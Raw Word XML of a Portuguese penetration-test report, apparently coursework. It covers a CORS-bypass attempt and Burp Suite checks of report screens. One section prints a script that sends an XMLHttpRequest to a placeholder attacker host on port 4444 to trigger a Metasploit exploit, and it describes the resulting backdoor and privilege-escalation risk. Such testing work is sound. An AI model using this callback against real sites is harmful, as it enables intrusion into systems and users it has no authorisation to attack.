        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="6A737C"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="008719F1"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script&gt;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conexão não seja aberta.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</w:pP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  <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7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8719F1" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>O sistema passou nos testes</w:t>
      </w:r>
      <w:r w:rsidR="008719F1" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. O comando </w:t>
      </w:r>
      <w:r w:rsidR="008719F1" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">“withCredentials” </w:t>
      </w:r>
      <w:r w:rsidR="008719F1" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> encontra-se depreciado e a conexão não ocorreu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77F75" w:rsidRPr="00F15F82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E77F75" w:rsidRPr="00F15F82" w:rsidRDefault="00E77F7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7CAE520" wp14:editId="4DC4DDE2">
            <wp:extent cx="5400040" cy="64960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ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i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30</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="008719F1" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Console do navegador indicando a </w:t>
      </w:r>
      <w:r w:rsidR="00751591" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>depreciação</w:t>
      </w:r>
      <w:r w:rsidR="008719F1" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> do atributo </w:t>
      </w:r>
      <w:r w:rsidR="008719F1" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“withCredencials”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00751591" w:rsidRPr="00F15F82" w:rsidRDefault="00751591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F15F82" w:rsidRDefault="0048383A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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008719F1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Para burlar o filtro CORS, deve ser adicionado ao cabeçalho da requisição uma instrução que simule uma assinatura válida para o navegador. Para esse fim, foi utilizado a instrução “</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">setRequestHeader” </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>para adicionar as credenciais maliciosas ao cabeçalho.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00881DA5" w:rsidP="00AC10DC">
      <w:pPr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O código abaixo cria um objeto do tipo XMLHttpRequest e inicia uma chamada Ajax  dotipo GET para IP_do_servidor na porta 4444 de forma assíncrona.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hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w: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&lt;script&gt;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r = </w:t>
      </w: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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>new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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>XMLHttpRequest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 xml:space="preserve">(); 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r.open(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4A1C21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"GET"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,’</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1155CC"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://IP_do_servidor:4444’,false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t>);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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>r.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="303336"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>setRequestHeader(“</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="353528"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFAF6"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Access-Control-Allow-Origin</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="303336"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>”,”*”);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC">
      <w:pPr>
        <w:spacing w:after="22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eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="6A737C"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="181A1C"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>.send();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&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="6A737C"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82"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  <w:t>script&gt;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5F82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F06E4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Espera-se que a conexão não seja aberta.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B04AF1" w:rsidRPr="00F15F82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1E29F7" w:rsidRPr="00F15F82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0F06E4" w:rsidRPr="00F15F8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D76012" w:rsidRPr="00F15F82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881DA5" w:rsidRPr="00F15F82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="00D76012" w:rsidRPr="00F15F82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0F06E4" w:rsidRPr="00F15F82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8C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Conforme as figuras 32 e 33, a</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> requisição foi bem sucedida e o Metasploit conseguiu iniciar o exploit.</w:t>
      </w:r>
      <w:r w:rsidR="000F06E4" w:rsidRPr="00F15F82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F15F82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15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Através desse exploit, uma conexão entre máquina atacada e o sistema atacante é aberta podendo haver graves consequências como: Escalada de privilégios na máquina atacada e criação de backdoors.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00751591" w:rsidRPr="00F15F82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E77F75" w:rsidRPr="00F15F82" w:rsidRDefault="00E77F75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80F81A" wp14:editId="32BABE7C">
            <wp:extent cx="5400040" cy="1994535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31</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
      <w:r w:rsidR="00E52417" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Console do navegador indicando a conexão.</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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E77F75" w:rsidRPr="00F15F82" w:rsidRDefault="00E77F7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                             </w:t>
      </w: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2A6800" wp14:editId="12E49062">
            <wp:extent cx="3600450" cy="13239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15F82" w:rsidRDefault="00777DDF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32</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Exploit inciado com sucesso.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F06E4" w:rsidRPr="00F15F82" w:rsidRDefault="000F06E4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5.2 </w:t>
      </w:r>
      <w:r w:rsidR="00777DDF" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Atividade: mapeamento</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> de vulnerabilidades – Tela Relatórios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i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tarefa realizada dia 24/05/16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ab/>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="005A089C" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Duração total das sessões executadas</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: 15 minutos.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lastRenderedPageBreak/>
        <w:t>Objetivo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Utilizar o Burp Suite para descobrir as vulnerabilidades existentes na tela Relatório e indicar as possíveis técnicas que devem ser utilizadas para explorar as vulnerabilidades encontradas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC">
      <w:pPr>
        <w:spacing w:after="0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8C6DC7" w:rsidP="00AC10DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b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>Resultados obtidos no momento de gerar um relatório dos dados cadastrados no sistema:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D038A" w:rsidRPr="00F15F82" w:rsidRDefault="000D038A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F15F82" w:rsidRDefault="000D038A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583C4E9" wp14:editId="0B25F929">
            <wp:extent cx="5400040" cy="12706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34(Editada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91" w:rsidRPr="00F15F82" w:rsidRDefault="00777DDF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Figura 33 </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- Burp Suite utilizado para captura de parâmetros no cabeçalho de uma requisição HTTP na tela Relatório.</w:t>
      </w:r>
      <w:r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pStyle w:val="ListParagraph"/>
        <w:ind w:left="0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De acordo com o Burp Suite, a página não recebe nenhum parâmetro pois todos os dados disponíveis da aplicação são trazidos direto da base de dados para a tela</w:t>
      </w:r>
      <w:r w:rsidR="008719F1" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="BFBFBF" w:themeColor="background1" w:themeShade="BF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Quando se utiliza os campos de filtros na tela, não há requisição, pois a aplicação usa os dados carregados para filtrar os dados que serão exibidos no relatório</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82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  <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mediante a esse contexto, não foram encontradas vulnerabilidades que pudessem ser exploradas.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82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</w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="0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F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Resultados obtidos no momento de gerar uma impressão para um relatório:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77F75" w:rsidRPr="00F15F82" w:rsidRDefault="00E77F7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F15F82" w:rsidRDefault="000D038A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AD45D8E" wp14:editId="5015EB40">
            <wp:extent cx="5400040" cy="11036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35(Editada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91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>Figura 3</w:t>
      </w:r>
      <w:r w:rsidR="00777DDF" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">4 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- Burp Suite utilizado para captura de parâmetros no cabeçalho de uma requisição HTTP na tela Impressão de Relatório.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Da mesma maneira que </w:t>
      </w:r>
      <w:r w:rsidR="008719F1" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>foi detectado na tela Relatório</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, a ferramenta indica que a tela Impressão de Relatório não gera nenhum tipo de requisição e não recebe nenhum parâmetro manipulável. Dessa forma, não foram encontradas vulnerabilidades que pudessem ser exploradas.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Referências</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82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B01036" w:rsidP="00630433">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr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3">
        <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Piores Senhas 2015</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008C6DC7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4" w:history="1">
        <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82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SQLMAP usando POST</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId45"/>
    </w:p>
    <w:p w:rsidR="008C6DC7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6" w:history="1">
        <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>NTP</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82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7" w:history="1">
        <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82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NetBios</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId48" w:history="1">
        <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>SNMP</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7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9" w:history="1">
        <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82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CORS</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008C6DC7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0" w:history="1">
        <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82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w3c - Especificação CORS</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008C6DC7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1" w:history="1">
        <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82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MYSQL</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008C6DC7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2" w:history="1">
        <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82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SQL Server</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008C6DC7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color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId53" w:history="1">
        <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82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Oracle</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00BC5DD9" w:rsidRPr="00F15F82" w:rsidRDefault="00B01036" w:rsidP="0063043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bCs/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId54" w:history="1">
        <w:r w:rsidR="00BC5DD9" w:rsidRPr="00F15F82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L2TP</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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DB70B5" w:rsidRPr="00F15F82" w:rsidRDefault="00DB70B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sectPr w:rsidR="00DB70B5" w:rsidRPr="00F15F82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680" w:rsidRDefault="00AF4680" w:rsidP="009A6B56">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00AF4680" w:rsidRDefault="00AF4680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680" w:rsidRDefault="00AF4680" w:rsidP="009A6B56">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00AF4680" w:rsidRDefault="00AF4680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A4C9F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 w15:restartNumberingAfterBreak="0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 w15:restartNumberingAfterBreak="0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047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26" w:hanging="1440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0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5" w15:restartNumberingAfterBreak="0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6" w15:restartNumberingAfterBreak="0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7" w15:restartNumberingAfterBreak="0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8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2C8934BE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5A48171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0" w15:restartNumberingAfterBreak="0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1" w15:restartNumberingAfterBreak="0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2" w15:restartNumberingAfterBreak="0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3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="3B990FE6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2932B0B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-2689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251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237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2233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20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914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173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-15952" w:hanging="1440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
